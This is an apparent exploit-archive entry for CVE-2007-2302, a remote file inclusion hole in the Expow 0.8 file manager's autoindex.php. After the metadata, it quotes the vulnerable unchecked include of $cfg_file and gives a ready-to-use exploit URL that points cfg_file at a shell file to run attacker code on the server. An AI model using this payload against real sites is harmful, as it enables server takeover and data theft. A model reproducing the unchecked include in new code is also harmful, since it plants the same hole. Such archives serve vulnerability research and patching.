Expow 0.8 - 'autoindex.php?cfg_file' Remote File Inclusion
Author: mdx
type: webapps
platform: php
port:
date_added: 2007-04-11
date_updated: 2016-09-30
verified: 1
codes: OSVDB-35731;CVE-2007-2302
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comexpow-0.8.tar.gz
raw file: 3722.txt
Expow 0.8 File manager Autoindex.php (cfg_file) Remote File Inclusion Vulnerability
__________________________________________________________________________
found by : mdx
--------------------------------------------------------------------------
Download script : http://sourceforge.net/project/downloading.php?group_id=29595&use_mirror=kent&filename=expow-0.8.tar.gz&92927218
--------------------------------------------------------------------------
file name : autoindex.php
__________________________________________________________________________
Ãncluded line ;
if (!include($cfg_file))
__________________________________________________________________________
Exploit :
http://site.com/[path]/autoindex.php?cfg_file=shellmdx.txt?
# milw0rm.com [2007-04-12]